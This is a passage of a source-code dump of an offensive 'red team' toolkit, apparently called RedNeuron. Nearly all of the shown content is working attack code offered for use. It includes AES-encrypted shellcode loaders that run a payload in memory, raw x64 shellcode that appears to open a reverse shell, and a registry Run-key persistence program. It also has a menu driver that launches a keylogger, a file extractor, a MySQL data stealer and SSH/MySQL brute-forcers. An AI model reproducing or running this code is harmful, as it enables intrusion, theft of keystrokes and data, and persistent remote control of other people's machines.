} 33 | // delete hook 34 | UnhookWindowsHookEx(hook); 35 | return 0; 36 | } 37 | -------------------------------------------------------------------------------- /code/postexploitation/keylogger/keylogger.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/keylogger/keylogger.exe -------------------------------------------------------------------------------- /code/postexploitation/keylogger/keylogger.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | ENDCOLOR="\e[0m" 7 | 8 | echo -e "${GREEN}[*]${ENDCOLOR} Creating keylogger..." 9 | 10 | cp code/postexploitation/keylogger/keylogger.exe . 11 | 12 | echo -e "${GREEN}[*]${ENDCOLOR} Done!" 13 | 14 | -------------------------------------------------------------------------------- /code/postexploitation/postExpShell.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/postexploitation/postExpShell.h -------------------------------------------------------------------------------- /code/proclist/ProcList.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "conio.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include "ColorClass.h" 12 | 13 | void PrintProcessNameAndID(DWORD processID) { 14 | TCHAR szProcessName[MAX_PATH] = TEXT(""); 15 | 16 | // Get a handle to the process. 17 | HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID); 18 | 19 | // Get the process name. 20 | if (NULL != hProcess) { 21 | HMODULE hMod; 22 | DWORD cbNeeded; 23 | 24 | if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) { 25 | GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)); 26 | } 27 | } 28 | 29 | // Get the parent process ID 30 | DWORD parentProcessID = 0; 31 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 32 | if (hSnapshot != INVALID_HANDLE_VALUE) { 33 | PROCESSENTRY32 pe32; 34 | pe32.dwSize = sizeof(PROCESSENTRY32); 35 | 36 | if (Process32First(hSnapshot, &pe32)) { 37 | do { 38 | if (pe32.th32ProcessID == processID) { 39 | parentProcessID = pe32.th32ParentProcessID; 40 | break; 41 | } 42 | } while (Process32Next(hSnapshot, &pe32)); 43 | } 44 | CloseHandle(hSnapshot); 45 | } 46 | 47 | // Get the username of the process owner 48 | HANDLE hToken; 49 | if (OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) { 50 | DWORD cbTokenUser = 0; 51 | GetTokenInformation(hToken, TokenUser, NULL, 0, &cbTokenUser); 52 | std::vector userInfo(cbTokenUser); 53 | if (GetTokenInformation(hToken, TokenUser, userInfo.data(), cbTokenUser, &cbTokenUser)) { 54 | SID_NAME_USE SidType; 55 | TCHAR lpName[UNLEN + 1]; 56 | DWORD cchName = UNLEN + 1; 57 | TCHAR lpReferencedDomainName[UNLEN + 1]; 58 | DWORD cchReferencedDomainName = UNLEN + 1; 59 | if (LookupAccountSid(NULL, reinterpret_cast(userInfo.data())->User.Sid, lpName, &cchName, lpReferencedDomainName, &cchReferencedDomainName, &SidType)) { 60 | printf("Process name: "); 61 | std::wcout << szProcessName << std::endl; 62 | printf("Process ID: "); 63 | std::wcout << processID << std::endl; 64 | printf("Parent Process ID: "); 65 | std::wcout << parentProcessID << std::endl; 66 | printf("User name: "); 67 | std::wcout << lpName << std::endl; 68 | CloseHandle(hProcess); 69 | CloseHandle(hToken); 70 | } 71 | } 72 | } 73 | } 74 | int main() { 75 | DWORD aProcesses[1024], cbNeeded, cProcesses; 76 | unsigned int i; 77 | 78 | // Get the list of process identifiers. 79 | if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded)) { 80 | return 1; 81 | } 82 | 83 | // Calculate how many process identifiers were returned. 84 | cProcesses = cbNeeded / sizeof(DWORD); 85 | 86 | // Print the name and process identifier for each process. 87 | for (i = 0; i < cProcesses; i++) { 88 | if (aProcesses[i] != 0) { 89 | PrintProcessNameAndID(aProcesses[i]); 90 | std::cout << std::endl; 91 | } 92 | } 93 | 94 | getch(); 95 | return 0; 96 | } 97 | -------------------------------------------------------------------------------- /code/proclist/procList.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/proclist/procList.exe -------------------------------------------------------------------------------- /code/proclist/proclist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | BLUE="\e[34m" 7 | ENDCOLOR="\e[0m" 8 | 9 | printf "\nPATH to save EXE = " 10 | read -r shellpath 11 | 12 | cp code/proclist/procList.exe $shellpath 13 | 14 | ls $shellpath/procList.exe >/dev/null 15 | e=$(echo $?) 16 | 17 | if [ $e == 0 ]; then 18 | echo -e "${GREEN}\n[+] EXE Created Successfully - $shellpath/procList.exe${ENDCOLOR}" 19 | else 20 | echo -e "${RED}\n[-] Error Creating EXE${ENDCOLOR}\n" 21 | exit 22 | fi 23 | 24 | -------------------------------------------------------------------------------- /code/revshell.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #pragma comment (lib, "crypt32.lib") 7 | #pragma comment (lib, "advapi32") 8 | #include 9 | #include "helpers.h" 10 | 11 | typedef LPVOID (WINAPI * VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 12 | typedef VOID (WINAPI * RtlMoveMemory_t)(VOID UNALIGNED *Destination, const VOID UNALIGNED *Source, SIZE_T Length); 13 | 14 | 15 | int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) { 16 | HCRYPTPROV hProv; 17 | HCRYPTHASH hHash; 18 | HCRYPTKEY hKey; 19 | if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){ 20 | return -1; 21 | } 22 | if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){ 23 | return -1; 24 | } 25 | if (!CryptHashData(hHash, (BYTE*) key, (DWORD) keylen, 0)){ 26 | return -1; 27 | } 28 | if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){ 29 | return -1; 30 | } 31 | 32 | if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, (BYTE *) payload, (DWORD *) &payload_len)){ 33 | return -1; 34 | } 35 | CryptReleaseContext(hProv, 0); 36 | CryptDestroyHash(hHash); 37 | CryptDestroyKey(hKey); 38 | return 0; 39 | } 40 | 41 | unsigned char payload[] = payloadaes 42 | unsigned char key[] = KEYAES 43 | 44 | 45 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 46 | void * exec_mem; 47 | BOOL rv; 48 | HANDLE th; 49 | DWORD oldprotect = 0; 50 | VirtualAlloc_t pVirtualAlloc = (VirtualAlloc_t) hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), "VirtualAlloc"); 51 | RtlMoveMemory_t pRtlMoveMemory = (RtlMoveMemory_t) hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), "RtlMoveMemory"); 52 | unsigned int payload_len = sizeof(payload); 53 | exec_mem = pVirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 54 | AESDecrypt((char *) payload, payload_len, (char *) key, sizeof(key)); 55 | pRtlMoveMemory(exec_mem, payload, payload_len); 56 | rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect); 57 | if ( rv != 0 ) { 58 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); 59 | WaitForSingleObject(th, -1); 60 | } 61 | return 0; 62 | } 63 | -------------------------------------------------------------------------------- /code/revshell2.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #pragma comment (lib, "crypt32.lib") 7 | #pragma comment (lib, "advapi32") 8 | #include 9 | #include "helpers.h" 10 | 11 | typedef LPVOID (WINAPI * VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 12 | typedef VOID (WINAPI * RtlMoveMemory_t)(VOID UNALIGNED *Destination, const VOID UNALIGNED *Source, SIZE_T Length); 13 | 14 | 15 | int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) { 16 | HCRYPTPROV hProv; 17 | HCRYPTHASH hHash; 18 | HCRYPTKEY hKey; 19 | if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){ 20 | return -1; 21 | } 22 | if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){ 23 | return -1; 24 | } 25 | if (!CryptHashData(hHash, (BYTE*) key, (DWORD) keylen, 0)){ 26 | return -1; 27 | } 28 | if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){ 29 | return -1; 30 | } 31 | 32 | if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, (BYTE *) payload, (DWORD *) &payload_len)){ 33 | return -1; 34 | } 35 | CryptReleaseContext(hProv, 0); 36 | CryptDestroyHash(hHash); 37 | CryptDestroyKey(hKey); 38 | return 0; 39 | } 40 | 41 | unsigned char payload[] = { 0xfa, 0x53, 0x63, 0xfb, 0xdb, 0x2, 0x37, 0x18, 0x18, 0x99, 0xfd, 0x58, 0x87, 0xc8, 0x39, 0xc1, 0xd0, 0xea, 0x37, 0xb5, 0xdc, 0x2c, 0xb6, 0x10, 0x42, 0xdf, 0xee, 0xd6, 0xa1, 0x58, 0x2d, 0x79, 0x65, 0x4f, 0xd2, 0x62, 0x2f, 0x6a, 0xd6, 0xe6, 0x8b, 0x8, 0x71, 0x51, 0xc, 0xcf, 0x55, 0xd8, 0x12, 0xd2, 0x2, 0xc9, 0xc2, 0x55, 0x57, 0x41, 0x1a, 0xff, 0xb, 0x1, 0x3a, 0x24, 0xab, 0xb9, 0xae, 0x83, 0xef, 0xb2, 0xbb, 0xae, 0x69, 0xef, 0xc, 0xb, 0x74, 0x58, 0x89, 0x54, 0x2, 0xa5, 0x2e, 0xc1, 0xb5, 0x21, 0xce, 0xc5, 0x2e, 0x63, 0x1f, 0x93, 0x10, 0x85, 0xdb, 0x3e, 0x48, 0xa3, 0xf0, 0x8f, 0xdb, 0xf, 0xea, 0xab, 0x5f, 0x35, 0x63, 0x2b, 0x23, 0x7c, 0x81, 0x1d, 0xb1, 0xb0, 0x57, 0xdd, 0x6e, 0x85, 0x82, 0x2, 0x58, 0x4d, 0x41, 0xe9, 0x5d, 0x1a, 0x81, 0x80, 0x8c, 0x71, 0xbb, 0x8f, 0x4a, 0xf0, 0xe4, 0xc4, 0x80, 0xdc, 0xd, 0xd5, 0x17, 0x6, 0xe6, 0x5d, 0xeb, 0x5, 0xb7, 0xdb, 0x2a, 0xb3, 0xe3, 0xf4, 0xe0, 0x49, 0xb8, 0xc6, 0x6e, 0x29, 0xf2, 0xd1, 0x92, 0x7a, 0x76, 0xa6, 0xa1, 0x8b, 0x19, 0xe0, 0x91, 0x2f, 0x2e, 0x6f, 0x85, 0x1f, 0x62, 0x18, 0x58, 0x2f, 0xe5, 0x19, 0xed, 0xc3, 0x2, 0x35, 0x81, 0x1e, 0xea, 0x20, 0x8f, 0x89, 0x3b, 0x77, 0xc9, 0xdb, 0xc8, 0x7c, 0xb7, 0x5b, 0x69, 0x5e, 0xcc, 0xe, 0x96, 0xc1, 0x66, 0x96, 0x7d, 0xf, 0x1d, 0xab, 0x4c, 0x93, 0x62, 0x7a, 0x67, 0xa5, 0x6f, 0x6e, 0x93, 0xe5, 0xea, 0xe6, 0x3f, 0xbc, 0xc5, 0x97, 0x2f, 0x22, 0xd0, 0x2a, 0x78, 0xb4, 0xaf, 0x3b, 0xef, 0x45, 0xc3, 0x53, 0x7f, 0x2f, 0x2b, 0x64, 0x46, 0x3b, 0xe5, 0x85, 0xbf, 0x71, 0x47, 0x1a, 0x34, 0x93, 0x68, 0xaa, 0x47, 0x14, 0x75, 0xf0, 0x71, 0xfb, 0x98, 0x91, 0x5b, 0x22, 0xaf, 0x28, 0xf7, 0xa2, 0xa2, 0xc4, 0xc7, 0x50, 0x3b, 0x51, 0xd4, 0x3f, 0xc5, 0x26, 0x1b, 0x73, 0x38, 0xfa, 0xb1, 0xfb, 0x78, 0x8c, 0x18, 0x74, 0xe7, 0xf9, 0x4d, 0x94, 0xa0, 0x3b, 0xf1, 0xe9, 0x31, 0x5d, 0x6d, 0x3f, 0xba, 0x54, 0xf5, 0x6e, 0x55, 0xa2, 0xe5, 0xc3, 0xe3, 0x3a, 0x4a, 0x96, 0xe3, 0x2, 0xa1, 0xd0, 0x90, 0xb, 0xb5, 0x35, 0x92, 0x81, 0x38, 0x30, 0xb0, 0x39, 0x94, 0x21, 0x2a, 0x91, 0x14, 0x10, 0x28, 0xa, 0xa, 0x2, 0x72, 0xf3, 0xf6, 0xc9, 0xa6, 0x27, 0x9f, 0x3c, 0xf8, 0x3c, 0x79, 0xb7, 0xfc, 0x9f, 0xf0, 0x3e, 0x53, 0x3d, 0x57, 0x63, 0xe6, 0x20, 0x8c, 0x41, 0x4b, 0xdd, 0xb9, 0x46, 0x5a, 0x5a, 0x6d, 0x1e, 0x5c, 0x37, 0x44, 0x9a, 0x86, 0x7, 0xc0, 0xc8, 0x93, 0x82, 0x82, 0xea, 0xb9, 0xcd, 0x47, 0x5e, 0x61, 0xbd, 0x25, 0xf, 0x9b, 0xd, 0xac, 0x2a, 0x4, 0x34, 0x9b, 0xa2, 0x0, 0x69, 0xe8, 0x76, 0x9f, 0xf6, 0x3c, 0xc0, 0xb, 0x20, 0xd3, 0x94, 0xb5, 0x5e, 0xce, 0xea, 0xbe, 0x50, 0x6b, 0x64, 0xf5, 0x25, 0xe9, 0xb2, 0xc7, 0x94, 0x2b, 0xad, 0xdc, 0xc6, 0x27, 0xe6, 0x56, 0x67, 0x35, 0xea, 0xc4, 0xa3, 0xbf, 0xc6, 0xc1, 0xbe, 0xb0, 0xf5, 0x68, 0x2b, 0xa2, 0x83, 0x9f, 0x6b, 0xba, 0x7e, 0x14, 0xf2, 0xb7, 0x17, 0xa6, 0x51, 0x37, 0xb6, 0x74, 0xcb, 0xac, 0x32, 0xe7, 0x47, 0x8e, 0xf8, 0x80, 0x30 }; 42 | unsigned char key[] = { 0x12, 0x4d, 0x3b, 0xa4, 0xdb, 0x63, 0x47, 0xf, 0xe, 0x8, 0x96, 0x8, 0xd2, 0x9e, 0x62, 0x90 }; 43 | 44 | 45 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 46 | void * exec_mem; 47 | BOOL rv; 48 | HANDLE th; 49 | DWORD oldprotect = 0; 50 | VirtualAlloc_t pVirtualAlloc = (VirtualAlloc_t) hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), "VirtualAlloc"); 51 | RtlMoveMemory_t pRtlMoveMemory = (RtlMoveMemory_t) hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), "RtlMoveMemory"); 52 | unsigned int payload_len = sizeof(payload); 53 | exec_mem = pVirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 54 | AESDecrypt((char *) payload, payload_len, (char *) key, sizeof(key)); 55 | pRtlMoveMemory(exec_mem, payload, payload_len); 56 | rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect); 57 | if ( rv != 0 ) { 58 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); 59 | WaitForSingleObject(th, -1); 60 | } 61 | return 0; 62 | } 63 | -------------------------------------------------------------------------------- /code/runkeys.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | char* tita; 8 | const char* exe; 9 | const char* exe2; 10 | 11 | using namespace std; 12 | 13 | int main(const char* exe) { 14 | exe = "calc.exe"; 15 | HKEY hkey = NULL; 16 | 17 | LONG res = RegOpenKeyEx(HKEY_CURRENT_USER,(LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hkey); 18 | if (res == ERROR_SUCCESS) { 19 | RegSetValueEx(hkey,(LPCSTR)"salsa", 0, REG_SZ, (unsigned char*)exe, strlen(exe)); 20 | RegCloseKey(hkey); 21 | } 22 | system("x86_64-w64-mingw32-g++ runkeys.cpp -I/usr/share/mingw-w64/include/ -o runkeys.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -Wmain"); 23 | } 24 | 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /code/shell.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "create.h" 4 | 5 | using namespace std; 6 | 7 | string op; 8 | int cont; 9 | 10 | void createshell(){ 11 | string op; 12 | cont = 0; 13 | createmenu(); 14 | while (op != "exit" && op != "Exit" && op != "EXIT" ) 15 | { 16 | if (cont != 0) { 17 | cout<<"\nRedNeuron@create-> "; 18 | } 19 | getline(cin, op); 20 | if (op == "list" || op == "List" || op == "LIST"){ 21 | listcreate(); 22 | } 23 | else if(op == "a"){ 24 | //hahah 25 | } 26 | else if (op == "help" || op == "Help" || op == "HELP"){ 27 | createmenu(); 28 | } 29 | else if (op == "reverse shell"){ 30 | createrevshell(); 31 | } 32 | else if (op == "revshell" || op == "Revshell" || op == "REVSHELL"){ 33 | createrevshell(); 34 | } 35 | else if (op == "clear" || op == "Clear" || op == "CLEAR"){ 36 | system("clear"); 37 | } 38 | else if (op == "commands" || op == "Commands" || op == "COMMANDS"){ 39 | createcommands(); 40 | } 41 | else if (op == "main" || op == "Main" || op == "MAIN"){ 42 | //soon... 43 | } 44 | else if (op == "persistence" || op == "Persistence" || op == "PERSISTENCE"){ 45 | createpersistence(); 46 | } 47 | else if (op == "proclist" || op == "Proclist" || op == "PROCLIST"){ 48 | createproclist(); 49 | } 50 | else if(op == "windowinjector" || op == "Windowinjector" || op == "WINDOWINJECTOR"){ 51 | createWindowInjector(); 52 | } 53 | else{ 54 | if (cont != 0){ 55 | red("\n[-] Command not found\n"); 56 | } 57 | } 58 | cont++; 59 | } 60 | } 61 | 62 | static int postexploitationshell(){ 63 | op = "a"; 64 | while (op != "exit" && op != "Exit" && op != "EXIT"){ 65 | cout<<"\nRedNeuron@postexploitation-> "; 66 | cin>>op; 67 | if (op == "help" || op == "Help" || op == "HELP"){ 68 | postexploitationmenu(); 69 | } 70 | else if (op == "clear" || op == "Clear" || op == "CLEAR"){ 71 | system("clear"); 72 | } 73 | else if (op == "list" || op == "List" || op == "LIST"){ 74 | // postexploitationlist(); 75 | } 76 | else if (op == "commands" || op == "Commands" || op == "COMMANDS"){ 77 | // postexploitationlist(); 78 | } 79 | else if (op == "file-extractor" || op == "File-extractor" || op == "FILE-EXTRACTOR"){ 80 | system("./code/postexploitation/file-extractor/file-extractor.sh"); 81 | } 82 | else if (op == "mysql-stealer" || op == "Mysql-stealer" || op=="MYSQL-STEALER"){ 83 | system("./code/postexploitation/MySQL-dataStealer/MySQL_DataStealer.sh"); 84 | } 85 | else if (op == "keylogger" || op == "Keylogger" || op == "KEYLOGGER"){ 86 | system("./code/postexploitation/keylogger/keylogger.sh"); 87 | } 88 | else if (op == "main" || op == "Main" || op == "MAIN"){ 89 | //soon... 90 | } 91 | else{ 92 | red("\n[-] Command not found\n"); 93 | } 94 | } 95 | return 0; 96 | } 97 | 98 | static int bruteforceshell(){ 99 | op = "a"; 100 | while (op != "exit" && op != "Exit" && op != "EXIT"){ 101 | cout<<"\nRedNeuron@bruteforce-> "; 102 | cin>>op; 103 | if (op == "ssh" || op == "Ssh" || op == "SSH"){ 104 | system("./code/bruteforce/ssh/bruteSSH"); 105 | } 106 | else if(op == "help" || op == "Help" || op == "HELP" || op == "commands" || op == "Commands" || op == "COMMANDS"){ 107 | bruteforcemenu(); 108 | } 109 | else if(op == "mysql" || op == "Mysql" || op == "MYSQL"){ 110 | system("./code/bruteforce/mysql/bruteMySQL"); 111 | } 112 | else if (op == "list" || op == "List" || op == "LIST"){ 113 | bruteforcelist(); 114 | } 115 | else if (op == "clear" || op == "Clear" || op == "CLEAR"){ 116 | system("clear"); 117 | } 118 | } 119 | return 0; 120 | } 121 | 122 | static int mainshell(){ 123 | op = "a"; 124 | while (op != "exit" && op != "Exit" && op != "EXIT" ){ 125 | cout<<"\nRedNeuron@main-> "; 126 | cin>>op; 127 | if (op == "create" || op == "Create" || op == "CREATE"){ 128 | createshell(); 129 | } 130 | else if (op == "create help" || op == "Create Help" || op == "CREATE HELP"){ 131 | //createmenu(); 132 | } 133 | else if (op == "create list" || op == "Create List" || op == "CREATE LIST"){ 134 | listcreate(); 135 | } 136 | else if (op == "create revshell" || op == "Create Revshell" || op == "CREATE REVSHELL"){ 137 | createrevshell(); 138 | } 139 | else if (op == "clear" || op == "Clear" || op == "CLEAR"){ 140 | system("clear"); 141 | } 142 | else if (op == "help" || op == "Help" || op == "HELP"){ 143 | helpmenu(); 144 | } 145 | else if (op == "list" || op == "List" || op == "LIST"){ 146 | commandsmenu(); 147 | } 148 | else if (op == "commands" || op == "Commands" || op == "COMMANDS"){ 149 | commandsmenu(); 150 | } 151 | else if (op == "bruteforce" || op == "Bruteforce" || op == "BRUTEFORCE"){ 152 | bruteforcemenu(); 153 | bruteforceshell(); 154 | } 155 | else if (op == "create reverse shell" || op == "Create Reverse Shell" || op == "CREATE REVERSE SHELL"){ 156 | createrevshell(); 157 | } 158 | else if (op == "postexploitation" || op == "Postexploitation" || op == "POSTEXPLOITATION"){ 159 | postexploitationmenu(); 160 | postexploitationshell(); 161 | } 162 | else{ 163 | red("\n[-] Command not found\n"); 164 | } 165 | } 166 | green("\nBye Bye :)"); 167 | 168 | return 0; 169 | } -------------------------------------------------------------------------------- /code/shellcode.c: -------------------------------------------------------------------------------- 1 | unsigned char buf[] = 2 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" 3 | "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" 4 | "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" 5 | "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" 6 | "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" 7 | "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" 8 | "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" 9 | "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" 10 | "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" 11 | "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" 12 | "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" 13 | "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" 14 | "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" 15 | "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" 16 | "\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33" 17 | "\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00" 18 | "\x00\x49\x89\xe5\x49\xbc\x02\x00\x04\xbc\xc0\xa8\x00\xf4" 19 | "\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07" 20 | "\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29" 21 | "\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48" 22 | "\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea" 23 | "\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89" 24 | "\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81" 25 | "\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00" 26 | "\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0" 27 | "\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01" 28 | "\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41" 29 | "\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d" 30 | "\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48" 31 | "\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff" 32 | "\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5" 33 | "\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 34 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"; 35 | -------------------------------------------------------------------------------- /code/temp.raw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/temp.raw -------------------------------------------------------------------------------- /code/windowname.txt: -------------------------------------------------------------------------------- 1 | Untitled - Notepad 2 | -------------------------------------------------------------------------------- /redneuron.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "code/menus.h" 3 | #include "code/shell.h" 4 | 5 | using namespace std; 6 | 7 | int main() { 8 | checkdependeces(); 9 | system("bash code/banner.sh"); 10 | mainmenu(); 11 | cout<<"\n\n"; 12 | helpmenu(); 13 | mainshell(); 14 | return 0; 15 | } 16 | 17 | -------------------------------------------------------------------------------- /redneuron.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/redneuron.zip --------------------------------------------------------------------------------